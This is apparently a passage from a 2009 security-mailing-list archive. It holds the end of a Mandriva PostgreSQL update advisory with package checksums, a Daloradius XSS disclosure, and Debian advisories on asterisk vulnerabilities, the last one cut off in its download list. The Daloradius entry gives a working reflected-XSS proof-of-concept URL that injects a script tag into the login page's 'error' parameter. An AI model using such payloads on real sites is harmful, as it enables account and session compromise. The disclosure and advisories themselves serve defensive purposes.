cf01e27ebed1d7541c7dfe9fe7eaec20 2008.0/x86_64/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.x86_64.rpm
16fe157d591066b6c7bd12ef79c78972 2008.0/x86_64/postgresql8.2-server-8.2.15-0.1mdv2008.0.x86_64.rpm
c5b58224e6becb9334cd555747fd040e 2008.0/x86_64/postgresql8.2-test-8.2.15-0.1mdv2008.0.x86_64.rpm
0e826718d8fe8571618ffdff6304b9d9 2008.0/x86_64/postgresql-devel-8.2.15-0.1mdv2008.0.x86_64.rpm
37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm

Mandriva Linux 2009.0:
eb4c7ac210259c34ce96873fa11cdd7b 2009.0/i586/libecpg8.3_6-8.3.9-0.1mdv2009.0.i586.rpm
ea79f082d51e575072e22e3f37705e76 2009.0/i586/libpq8.3_5-8.3.9-0.1mdv2009.0.i586.rpm
21dda67f89a7291aa530bdc0b04b3893 2009.0/i586/postgresql8.3-8.3.9-0.1mdv2009.0.i586.rpm
09d1a7d4bcad3b754772e03bfdd85768 2009.0/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.i586.rpm
ec004d65e57abb94a1c40ebd0e8b0a24 2009.0/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.0.i586.rpm
cae8230c899fd71fd28fc3baaa983e95 2009.0/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.0.i586.rpm
e9a46436f40e44e2b4757b6ee2db2dc3 2009.0/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.0.i586.rpm
edc0dcc12a27a2166f8e14f147f8540d 2009.0/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.i586.rpm
1c8b6afc908d4e0037085b2b275b0893 2009.0/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.i586.rpm
f0a4b90047b26f6de9c0c5475ede00e8 2009.0/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.i586.rpm
1bbd1b65ed0b65a62963eaccb8008666 2009.0/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.i586.rpm
27124329934314f3f73571e83e5fdaf3 2009.0/i586/postgresql8.3-server-8.3.9-0.1mdv2009.0.i586.rpm
9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
6aa7262c7041f8fb039a8031965a6a71 2009.0/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.0.x86_64.rpm
61af7c606839a7fff0ff56991dfd7021 2009.0/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.0.x86_64.rpm
2ff4745b162e6b4234862b1b2fcd315f 2009.0/x86_64/postgresql8.3-8.3.9-0.1mdv2009.0.x86_64.rpm
50d9eaffaf04beea769d22e058a1f2a8 2009.0/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.x86_64.rpm
d9fe796fce569179e8e99ae74a63af76 2009.0/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.0.x86_64.rpm
980a800e9ac2a0890d24ae0e843fd6e0 2009.0/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.0.x86_64.rpm
27334694d9da6e19904c8198d7f6ef43 2009.0/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.0.x86_64.rpm
68f2566b2de77da452d4b8043cf8a0de 2009.0/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.x86_64.rpm
31c3643e58947d76207345d8e82a6483 2009.0/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.x86_64.rpm
8e342cf436ed4bd6ea61244bca980054 2009.0/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.x86_64.rpm
30ba385a932cf752cfd85dd3a0833c40 2009.0/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.x86_64.rpm
e1253c9933f47db51ecd7edc825a703e 2009.0/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.0.x86_64.rpm
9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm

Mandriva Linux 2009.1:
91a80a39b17253f9321f325979afff81 2009.1/i586/libecpg8.3_6-8.3.9-0.1mdv2009.1.i586.rpm
7b27f7064a9b75d50d54e3d782ccea54 2009.1/i586/libpq8.3_5-8.3.9-0.1mdv2009.1.i586.rpm
62da0a6d0030c98fd608a33fb123456c 2009.1/i586/postgresql8.3-8.3.9-0.1mdv2009.1.i586.rpm
7c7dede7142fd2e3ed2ebdb3c519b623 2009.1/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.i586.rpm
345e475a35916f7416d4f8b0bf75436b 2009.1/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.1.i586.rpm
97a70a0872a839f83a2739eaed6607a9 2009.1/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.1.i586.rpm
0eed7e9ebefdddcaf27e42d33629dabf 2009.1/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.1.i586.rpm
61952d53ebee9a18a5cf9a10988c4fa3 2009.1/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.i586.rpm
9cdd01198d4d25ef569cc081c411c050 2009.1/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.i586.rpm
7b9ba830df3a61827eab05cfada3f09b 2009.1/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.i586.rpm
42fb3e9486162d383bc67d24eb613b1f 2009.1/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.i586.rpm
db31dcac659eed1a48ee714125c61e78 2009.1/i586/postgresql8.3-server-8.3.9-0.1mdv2009.1.i586.rpm
be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm

Mandriva Linux 2009.1/X86_64:
c803bc340e21af79f5745df0fee8aead 2009.1/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.1.x86_64.rpm
616b2b6f79a848fe57410af986c81bda 2009.1/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.1.x86_64.rpm
877e5894da539e59805469d16dfda370 2009.1/x86_64/postgresql8.3-8.3.9-0.1mdv2009.1.x86_64.rpm
be3ece7cf5ae31d25dc365389b4e8334 2009.1/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.x86_64.rpm
c58f7bf0768b22f5ff229c5cfd4c5f52 2009.1/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.1.x86_64.rpm
f3252fd034dcf0a47552b78439fccd4a 2009.1/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.1.x86_64.rpm
1b425723f71982812ebf429188cb88da 2009.1/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.1.x86_64.rpm
5b463c7748dcc5fae7b1e7443ee75694 2009.1/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.x86_64.rpm
70d521df18f5fbfffe7073b95a614ff8 2009.1/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.x86_64.rpm
33a607815a4da55a66101fd13062477e 2009.1/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.x86_64.rpm
508aae591f0f59aecde2f4212416a45c 2009.1/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.x86_64.rpm
8b8f650803166b84ba3a3ff4c538ab89 2009.1/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.1.x86_64.rpm
be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm

Mandriva Linux 2010.0:
1869824366c51ebb0b55055426bd2c53 2010.0/i586/libecpg8.4_6-8.4.2-0.1mdv2010.0.i586.rpm
2bb29a6b0aaa2d556b6c9d5b86a6fac2 2010.0/i586/libpq8.4_5-8.4.2-0.1mdv2010.0.i586.rpm
234ea96d6f15028e48fb4d67ba8e3dc0 2010.0/i586/postgresql8.4-8.4.2-0.1mdv2010.0.i586.rpm
c044f451d83daa297d1b6bea592c5759 2010.0/i586/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.i586.rpm
33167e61bf2e5f8132e581306fb3f9b3 2010.0/i586/postgresql8.4-devel-8.4.2-0.1mdv2010.0.i586.rpm
52c063f6a31ef49b87fe70227e1cc7a1 2010.0/i586/postgresql8.4-docs-8.4.2-0.1mdv2010.0.i586.rpm
dc75e2ebbab59312d6c1a491b6393f91 2010.0/i586/postgresql8.4-pl-8.4.2-0.1mdv2010.0.i586.rpm
a44bac65b39698446f4d066f77cd3085 2010.0/i586/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.i586.rpm
9537965ff95b6d6c62be3df17567f6c9 2010.0/i586/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.i586.rpm
32b66a3d2d191bf52ad1770ce92a24bd 2010.0/i586/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.i586.rpm
a45380a8bc2072792ab52042db3a837c 2010.0/i586/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.i586.rpm
b99ffb5c3cbb7266b63986b075b0eb95 2010.0/i586/postgresql8.4-server-8.4.2-0.1mdv2010.0.i586.rpm
7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm

Mandriva Linux 2010.0/X86_64:
864f7b0ab419b1c08fdbff5af593a9e3 2010.0/x86_64/lib64ecpg8.4_6-8.4.2-0.1mdv2010.0.x86_64.rpm
707a9ed081a46bea0cec38bd2bfe3561 2010.0/x86_64/lib64pq8.4_5-8.4.2-0.1mdv2010.0.x86_64.rpm
e3aa48ed1d6da44aaf791be57619043d 2010.0/x86_64/postgresql8.4-8.4.2-0.1mdv2010.0.x86_64.rpm
874e5a9ab5757e0d9c509eee102c0dc2 2010.0/x86_64/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.x86_64.rpm
90627e1bdc5988d3a78ee16491a27148 2010.0/x86_64/postgresql8.4-devel-8.4.2-0.1mdv2010.0.x86_64.rpm
cf905e15179fe18fa68ae02f35713139 2010.0/x86_64/postgresql8.4-docs-8.4.2-0.1mdv2010.0.x86_64.rpm
8e6957a4ca67801131ee70dbe4f3639a 2010.0/x86_64/postgresql8.4-pl-8.4.2-0.1mdv2010.0.x86_64.rpm
1b1e5de5c77a30672ea9bba9d49d7bed 2010.0/x86_64/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.x86_64.rpm
b87c3d4cd820d21eac3e66559d773508 2010.0/x86_64/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.x86_64.rpm
cfcaf767fb6135169e3fb01704e2831e 2010.0/x86_64/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.x86_64.rpm
fd216fa6f5ecb1fa1d8f6429396b4142 2010.0/x86_64/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.x86_64.rpm
9c86fd1c896343e5c48b76aed566f8c8 2010.0/x86_64/postgresql8.4-server-8.4.2-0.1mdv2010.0.x86_64.rpm
7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm

Corporate 3.0:
8a71295ef109fe3ab7260170384c0ce7 corporate/3.0/i586/libecpg3-7.4.27-0.1.C30mdk.i586.rpm
11ef4350d665b4b2ef2fd926bd560aa8 corporate/3.0/i586/libecpg3-devel-7.4.27-0.1.C30mdk.i586.rpm
30c8a894b12b223ad491abd4547c1fd7 corporate/3.0/i586/libpgtcl2-7.4.27-0.1.C30mdk.i586.rpm
0fa521cc9af217d927ca79c91b0c9eae corporate/3.0/i586/libpgtcl2-devel-7.4.27-0.1.C30mdk.i586.rpm
3672fefda6db5e828c7d939a27314b38 corporate/3.0/i586/libpq3-7.4.27-0.1.C30mdk.i586.rpm
9a2ba43d5dc9593ca1bbab4647208080 corporate/3.0/i586/libpq3-devel-7.4.27-0.1.C30mdk.i586.rpm
2247db07ed8b627fbfc35ac648c2a5df corporate/3.0/i586/postgresql-7.4.27-0.1.C30mdk.i586.rpm
e616a70f043ff0b0482e87d56a1019cd corporate/3.0/i586/postgresql-contrib-7.4.27-0.1.C30mdk.i586.rpm
08f9f7e7f8fb429cf0c77cfa7eda23d3 corporate/3.0/i586/postgresql-devel-7.4.27-0.1.C30mdk.i586.rpm
6d3b0ed2ba2b362ac09db9c4ae07b9e2 corporate/3.0/i586/postgresql-docs-7.4.27-0.1.C30mdk.i586.rpm
69b5e9674499b805b8e27bb6c348feec corporate/3.0/i586/postgresql-jdbc-7.4.27-0.1.C30mdk.i586.rpm
392426960dd9831613903d460af31b80 corporate/3.0/i586/postgresql-pl-7.4.27-0.1.C30mdk.i586.rpm
c266e60a60a5c438dddd9fc3a9e86415 corporate/3.0/i586/postgresql-server-7.4.27-0.1.C30mdk.i586.rpm
7195e1843ccacf58dd3a8e6888f52687 corporate/3.0/i586/postgresql-tcl-7.4.27-0.1.C30mdk.i586.rpm
d5a7dacb4bbb6d35d0eac00f8fb3fe8f corporate/3.0/i586/postgresql-test-7.4.27-0.1.C30mdk.i586.rpm
72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm

Corporate 3.0/X86_64:
ca3ea7496d9340c6bc7466e478a821ff corporate/3.0/x86_64/lib64ecpg3-7.4.27-0.1.C30mdk.x86_64.rpm
0ede7c61f0595bff37777971a2e2d3ac corporate/3.0/x86_64/lib64ecpg3-devel-7.4.27-0.1.C30mdk.x86_64.rpm
a798bef9e8f689aed42f1317f59fb189 corporate/3.0/x86_64/lib64pgtcl2-7.4.27-0.1.C30mdk.x86_64.rpm
c5fbbf4818f054ad11be80dad96c2e2f corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.27-0.1.C30mdk.x86_64.rpm
e89bb5fa7f482af3779d4508ccdc0f90 corporate/3.0/x86_64/lib64pq3-7.4.27-0.1.C30mdk.x86_64.rpm
43966e84c38f69cf644e05f86bb157b9 corporate/3.0/x86_64/lib64pq3-devel-7.4.27-0.1.C30mdk.x86_64.rpm
7821bd199a8e957f862d2e6751f9993b corporate/3.0/x86_64/postgresql-7.4.27-0.1.C30mdk.x86_64.rpm
3b7c354b1438fbf7e5613ec4b9525144 corporate/3.0/x86_64/postgresql-contrib-7.4.27-0.1.C30mdk.x86_64.rpm
1271e5de07e40e7ef5d0b39ad4593cd8 corporate/3.0/x86_64/postgresql-devel-7.4.27-0.1.C30mdk.x86_64.rpm
17a2e21ba705128bc6dc234fa9222269 corporate/3.0/x86_64/postgresql-docs-7.4.27-0.1.C30mdk.x86_64.rpm
284c5e6b3bc707509767df7ec5940915 corporate/3.0/x86_64/postgresql-jdbc-7.4.27-0.1.C30mdk.x86_64.rpm
0b3d675d0991c98ea6b2a665eb587c29 corporate/3.0/x86_64/postgresql-pl-7.4.27-0.1.C30mdk.x86_64.rpm
742086f186cd02ce6e010aa5b0efcde4 corporate/3.0/x86_64/postgresql-server-7.4.27-0.1.C30mdk.x86_64.rpm
d5875f42122d0a021b1ae474a3c71de4 corporate/3.0/x86_64/postgresql-tcl-7.4.27-0.1.C30mdk.x86_64.rpm
e4eeed326ce8f6a6cd14d955c9af1c3b corporate/3.0/x86_64/postgresql-test-7.4.27-0.1.C30mdk.x86_64.rpm
72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm

Corporate 4.0:
f16a9d7c219db91a48f05d47fbb25328 corporate/4.0/i586/libecpg5-8.1.19-0.1.20060mlcs4.i586.rpm
46e5cba337eb64ebd722f1cf20a1bea0 corporate/4.0/i586/libecpg5-devel-8.1.19-0.1.20060mlcs4.i586.rpm
aa1bf8fa60ba634f847ef99743b54509 corporate/4.0/i586/libpq4-8.1.19-0.1.20060mlcs4.i586.rpm
c9b495e705a47e8c657fe486c6a73caa corporate/4.0/i586/libpq4-devel-8.1.19-0.1.20060mlcs4.i586.rpm
8576e546f41ec07302b09f22b800c2a3 corporate/4.0/i586/postgresql-8.1.19-0.1.20060mlcs4.i586.rpm
99c18cea6a827b10c4197dea71660714 corporate/4.0/i586/postgresql-contrib-8.1.19-0.1.20060mlcs4.i586.rpm
7a4ac00898e262a29c945ea24381a02c corporate/4.0/i586/postgresql-devel-8.1.19-0.1.20060mlcs4.i586.rpm
e10dde94402ce28c56d0a59f449b2120 corporate/4.0/i586/postgresql-docs-8.1.19-0.1.20060mlcs4.i586.rpm
2b0aaa02c58d5f75be11b93663ac2db2 corporate/4.0/i586/postgresql-pl-8.1.19-0.1.20060mlcs4.i586.rpm
898ffb6afa67a42abd8cbd415f20f12d corporate/4.0/i586/postgresql-plperl-8.1.19-0.1.20060mlcs4.i586.rpm
750c34d0bd6c1370a10f65b0fe0d042f corporate/4.0/i586/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.i586.rpm
0e2fae96fe4ae65e119ec57bc62d1c18 corporate/4.0/i586/postgresql-plpython-8.1.19-0.1.20060mlcs4.i586.rpm
ddfb7d5dcb55d11ca58c59072c96ffd8 corporate/4.0/i586/postgresql-pltcl-8.1.19-0.1.20060mlcs4.i586.rpm
0ff2a52751ddf2c15ab718e378864209 corporate/4.0/i586/postgresql-server-8.1.19-0.1.20060mlcs4.i586.rpm
dbd24a627e161243ace369ed2bd0cb59 corporate/4.0/i586/postgresql-test-8.1.19-0.1.20060mlcs4.i586.rpm
cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm

Corporate 4.0/X86_64:
ff727efb618417699e1d702c463c08ff corporate/4.0/x86_64/lib64ecpg5-8.1.19-0.1.20060mlcs4.x86_64.rpm
d9d0a5ed50a5ea130ec32fe942f58c90 corporate/4.0/x86_64/lib64ecpg5-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
64c1ae194c06762d74dc69105a16a6d3 corporate/4.0/x86_64/lib64pq4-8.1.19-0.1.20060mlcs4.x86_64.rpm
5ff5e5660fa8e69fdabc2ec56fb41f33 corporate/4.0/x86_64/lib64pq4-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
d92641b17c40ac1237651577a716d716 corporate/4.0/x86_64/postgresql-8.1.19-0.1.20060mlcs4.x86_64.rpm
c1a90670f7443af7ae03ddd89fe8ff86 corporate/4.0/x86_64/postgresql-contrib-8.1.19-0.1.20060mlcs4.x86_64.rpm
81907fd64a64793480a155ce04b7c8c1 corporate/4.0/x86_64/postgresql-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm
a1b78b2902098f4e2981deb47c14705f corporate/4.0/x86_64/postgresql-docs-8.1.19-0.1.20060mlcs4.x86_64.rpm
e3ed9cee0ba6f35ba20bcc593059dfc9 corporate/4.0/x86_64/postgresql-pl-8.1.19-0.1.20060mlcs4.x86_64.rpm
a4302fcb3ff0a03be6eadc2fa87e7772 corporate/4.0/x86_64/postgresql-plperl-8.1.19-0.1.20060mlcs4.x86_64.rpm
81df2078a490b8f7944e14947172a3cb corporate/4.0/x86_64/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.x86_64.rpm
33e8b703accdaf358014a4f4b9f20edf corporate/4.0/x86_64/postgresql-plpython-8.1.19-0.1.20060mlcs4.x86_64.rpm
a7d0b24be375bf699a16d856872ed3b0 corporate/4.0/x86_64/postgresql-pltcl-8.1.19-0.1.20060mlcs4.x86_64.rpm
124bb9309c4bcb6174703c933e81fdf8 corporate/4.0/x86_64/postgresql-server-8.1.19-0.1.20060mlcs4.x86_64.rpm
a63ab9b6d993eb50e5b437592423dfe7 corporate/4.0/x86_64/postgresql-test-8.1.19-0.1.20060mlcs4.x86_64.rpm
cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm

Mandriva Enterprise Server 5:
7954b4d7b6b3ad3a4dc075a63503e1d0 mes5/i586/libecpg8.3_6-8.3.9-0.1mdvmes5.i586.rpm
1631a58bfb19765fa166f6e507e9799b mes5/i586/libpq8.3_5-8.3.9-0.1mdvmes5.i586.rpm
643f5cada4cb4dbf53e7931a88be3f33 mes5/i586/postgresql8.3-8.3.9-0.1mdvmes5.i586.rpm
c14326f783c2a1f5b90ea623e00e95bf mes5/i586/postgresql8.3-contrib-8.3.9-0.1mdvmes5.i586.rpm
4e1c3db6f801090ab60b31028fbfaa18 mes5/i586/postgresql8.3-devel-8.3.9-0.1mdvmes5.i586.rpm
c36fcbf4195dbf7becd7c3dabf81e20b mes5/i586/postgresql8.3-docs-8.3.9-0.1mdvmes5.i586.rpm
524d653e230fbac674e9ce464d290b89 mes5/i586/postgresql8.3-pl-8.3.9-0.1mdvmes5.i586.rpm
9877115225ad4463430d7e0bf6debebd mes5/i586/postgresql8.3-plperl-8.3.9-0.1mdvmes5.i586.rpm
9bf0e1591576271129b01f4f0bd60b9e mes5/i586/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.i586.rpm
b64538f411412f4025471fcad1ce24c8 mes5/i586/postgresql8.3-plpython-8.3.9-0.1mdvmes5.i586.rpm
3f9499776b4395c5829c761daa952976 mes5/i586/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.i586.rpm
2f8625a2f70355715b426be163316c8c mes5/i586/postgresql8.3-server-8.3.9-0.1mdvmes5.i586.rpm
a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm

Mandriva Enterprise Server 5/X86_64:
af91e508191f984255fcca2cc4847dd5 mes5/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdvmes5.x86_64.rpm
2a9f7ddd1c6b1df8fbaed9f75855d215 mes5/x86_64/lib64pq8.3_5-8.3.9-0.1mdvmes5.x86_64.rpm
5a99bffb08073b986c113f4e01290acb mes5/x86_64/postgresql8.3-8.3.9-0.1mdvmes5.x86_64.rpm
34a240a407e23e22fa4fafcacd42aaa4 mes5/x86_64/postgresql8.3-contrib-8.3.9-0.1mdvmes5.x86_64.rpm
328ffce47393a37b8513ca4db35cfa0e mes5/x86_64/postgresql8.3-devel-8.3.9-0.1mdvmes5.x86_64.rpm
2813c49a1081e9ba21641ff0221c0282 mes5/x86_64/postgresql8.3-docs-8.3.9-0.1mdvmes5.x86_64.rpm
ae7edc79dfcbe71b63d3cc63002b999e mes5/x86_64/postgresql8.3-pl-8.3.9-0.1mdvmes5.x86_64.rpm
b329ee3b0bf6f225d63967194a9ad1f7 mes5/x86_64/postgresql8.3-plperl-8.3.9-0.1mdvmes5.x86_64.rpm
3357aeaff40947216df472606af69f92 mes5/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.x86_64.rpm
2d1643ae72848a853075a348c3e710b1 mes5/x86_64/postgresql8.3-plpython-8.3.9-0.1mdvmes5.x86_64.rpm
e190019db4c20a65fbcb6ec71b87fb73 mes5/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.x86_64.rpm
95397048806b12338bf90c216f93f8c6 mes5/x86_64/postgresql8.3-server-8.3.9-0.1mdvmes5.x86_64.rpm
a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLJ6UdmqjQ0CJFipgRAhI0AKDu7P9IZkttVPb8P6UTShYJa6HLxgCcC6JU
wNWFQRVDjFT4KODLej6slSQ=
=9pvm
-----END PGP SIGNATURE-----

Daloradius XSS Vulnerability

2009-12-15T05:08:15Z

###########################################
#
# Script Name : daloradius ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/daloradius/
#

###########################################

PoC :

http://[target]/[path]/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/root/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

[SECURITY] [DSA 1952-2] End-of-life announcement for asterisk in oldstable

2009-12-15T05:06:34Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1952-2 security@...
http://www.debian.org/security/ Steffen Joeris
December 15, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : asterisk

Security support for asterisk, an Open Source PBX and telephony toolkit,
has been discontinued for the oldstable distribution (etch).
The current version in oldstable is not supported by upstream anymore
and is affected by several security issues. Backporting fixes for these
and any future issues has become unfeasible and therefore we need to
drop our security support for the version in oldstable. We recommend
that all asterisk users upgrade to the stable distribution (lenny).

- ------------------------------------------------------------------------
Mailing list: debian-security-announce@...
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksniaEACgkQ62zWxYk/rQcCcwCgigVQZXQlWppjqlX9emMHDrIn
1qAAn2tZkODZpn+aHFtxylMZJYoWE54S
=aJJU
-----END PGP SIGNATURE-----

[SECURITY] [DSA 1952-1] New asterisk packages fix several vulnerabilities

2009-12-15T05:06:23Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1952-1 security@...
http://www.debian.org/security/ Steffen Joeris
December 15, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : asterisk
Vulnerability : several vulnerabilities
Problem type : remote
Debian-specific: no
CVE ID : CVE-2009-0041 CVE-2008-3903 CVE-2009-3727 CVE-2008-7220 CVE-2009-4055 CVE-2007-2383
Debian Bug : 513413 522528 554487 554486 559103

Several vulnerabilities have been discovered in asterisk, an Open Source
PBX and telephony toolkit. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-0041

It is possible to determine valid login names via probing, due to the
IAX2 response from asterisk (AST-2009-001).

CVE-2008-3903

It is possible to determine a valid SIP username, when Digest
authentication and authalwaysreject are enabled (AST-2009-003).

CVE-2009-3727

It is possible to determine a valid SIP username via multiple crafted
REGISTER messages (AST-2009-008).

CVE-2008-7220 CVE-2007-2383

It was discovered that asterisk contains an obsolete copy of the
Prototype JavaScript framework, which is vulnerable to several security
issues. This copy is unused and now removed from asterisk
(AST-2009-009).

CVE-2009-4055

It was discovered that it is possible to perform a denial of service
attack via RTP comfort noise payload with a long data length
(AST-2009-010).

For the stable distribution (lenny), these problems have been fixed in
version 1:1.4.21.2~dfsg-3+lenny1.

The security support for asterisk in the oldstable distribution (etch)
has been discontinued before the end of the regular Etch security
maintenance life cycle. You are strongly encouraged to upgrade to
stable.

For the testing distribution (squeeze) and the unstable distribution
(sid), these problems have been fixed in version 1:1.6.2.0~rc7-1.

We recommend that you upgrade your asterisk packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg.orig.tar.gz
Size/MD5 checksum: 5295205 f641d1140b964e71e38d27bf3b2a2d80
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.dsc
Size/MD5 checksum: 1984 69dcaf09361976f55a053512fb26d7b5
http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.4.21.2~dfsg-3+lenny1.diff.gz
Size/MD5 checksum: 150880 ba6e81cd6ab443ef04467d57a1d954b3

Architecture independent packages:

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.4.21.2~dfsg-3+lenny1_all.deb
Size/MD5 checksum: 1897736 f0b7912d2ea0377bbb3c56cbc067d230
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.4.21.2~dfsg-3+lenny1_all.deb
Size/MD5 checksum: 478858 b483c77c21df4ae9cea8a4277f96966a
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.4.21.2~dfsg-3+lenny1_all.deb
Size/MD5 checksum: 32514900 8d959ce35cc61436ee1e09af475459d1
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.4.21.2~dfsg-3+lenny1_all.deb
Size/MD5 checksum: 427650 fb8a7dd925c8d209f3007e2a7d6602d8

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dbg_1.4.21.2~dfsg-3+lenny1_alpha.deb
Size/MD5 checksum: 13039044 3fdf468968472853a921817681130898
http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.4.21.2~dfsg-3+lenny1_alpha.deb
Size/MD5 checksum: 393068 f6360d4fee30fd4e915ce6f381dd5e81
